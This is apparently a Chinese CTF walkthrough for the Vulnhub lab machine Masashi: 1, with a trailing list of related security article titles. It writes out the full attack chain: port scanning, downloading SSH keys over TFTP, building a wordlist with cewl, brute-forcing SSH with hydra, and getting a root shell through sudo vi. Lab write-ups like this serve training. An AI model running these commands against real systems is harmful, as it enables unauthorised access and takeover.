Vulnhub: Masashi: 1靶机

kali:192.168.111.111

靶机:192.168.111.236

信息收集

端口扫描

复制代码
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.236

查看80端口的robots.txt提示三个文件

snmpwalk.txt内容,tftp服务在1337端口

sshfolder.txt内容,提示用户名sv5

tftp连接目标下载id_rsaid_rsa.pub

复制代码
tftp 192.168.111.236 1337
get id_rsa
get id_rsa.pub

利用cewl爬取目标网站生成字典,再利用生成的字典爆破ssh

复制代码
cewl http://192.168.111.236 -w pass.txt
hydra -l sv5 -P ./pass.txt 192.168.111.236 -s 22 ssh -t 64

提权

sv5用户sudo权限

提升为root

复制代码
sudo -u root /usr/bin/vi /tmp/a.txt
:!/bin/bash									#进入末行模式输入

flag

相关推荐
xd18557855520 小时前
电影匹配引擎-基于鸿蒙的心情电影推荐应用开发实践
人工智能·安全·华为·harmonyos·鸿蒙
白帽小阳21 小时前
[特殊字符]【2026最新】零基础入门学网络安全(详细路线图),看这篇就够了!
学习·安全·web安全·网络安全·安全运营·学习路线·web渗透
qetfw1 天前
CentOS 7 配置 iptables 防火墙
安全
磐链科技1 天前
区块链链游安全警示:常见漏洞与攻击手段
安全·区块链
数据知道1 天前
HTTP/HTTPS 安全深度剖析:抓包、解密与证书陷阱
安全·http·https·mitmproxy·抓包解密
AI创界者1 天前
安全测试环境搭建:在 Kali Linux 中部署与配置开源 WebShell 管理工具 AntSword(蚁剑)
linux·运维·安全
深盾科技_Virbox1 天前
软件授权工具静默安装实践
java·运维·数据库·安全·软件需求
এ慕ོ冬℘゜1 天前
前端核心知识体系进阶:从安全机制、网络协议到原生 JS 实战全解析
前端·网络协议·安全
延凡科技1 天前
延凡科技综合监控预警处置平台—— 一体化视频AI安防闭环系统设计与功能实现[特殊字符]️
数据库·人工智能·科技·安全·能源
Amy187021118231 天前
筑牢算力底座的安全防线:直流绝缘监测如何为固态变压器保驾护航
安全